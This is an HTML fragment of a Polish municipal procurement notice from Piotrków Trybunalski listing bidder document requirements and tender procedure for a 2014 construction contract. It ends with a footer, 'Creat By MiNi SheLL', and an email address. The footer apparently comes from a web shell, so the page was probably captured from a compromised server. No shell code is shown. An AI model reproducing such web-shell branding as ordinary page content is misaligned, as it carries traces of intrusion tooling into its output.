<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz ofertowy według wzoru zawartego w specyfikacji istotnych warunków zamówienia - wg załącznika nr 1;
2.Oświadczenie o niepodleganiu wykluczeniu z postępowania na podstawie art. 24 ust 1 oraz ust 2 ustawy Pzp -  wg załącznika nr 2;
3. Oświadczenie o niezaleganiu z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne - wg załącznika nr 5;
4. Oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu - wg załącznika nr 6.
5.  Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;
6. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 5 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, stwierdzające odpowiednio, że:
a)nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b)nie orzeczono wobec niego zakazu ubiegania się o zamówienie,
c)nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
10. Jeżeli w kraju zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 5 zastępuje się je dokumentem zawierającym oświadczenie  w którym określi się także osoby uprawnione do reprezentacji wykonawcy złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Umowa zostanie zawarta na warunkach kreślonych we wzorze umowy stanowiącym załącznik do SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.piotrkow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Piotrkowa Trybunalskiego
Pasaż Karola Rudowskiego 10 
Piotrków Tryb. 97-300 
pok.317.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.10.2014 godzina 09:00, miejsce: Urząd Miasta Piotrkowa Trybunalskiego
Pasaż Karola Rudowskiego 10 
Piotrków Tryb. 97-300 
punkt informacyjny.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com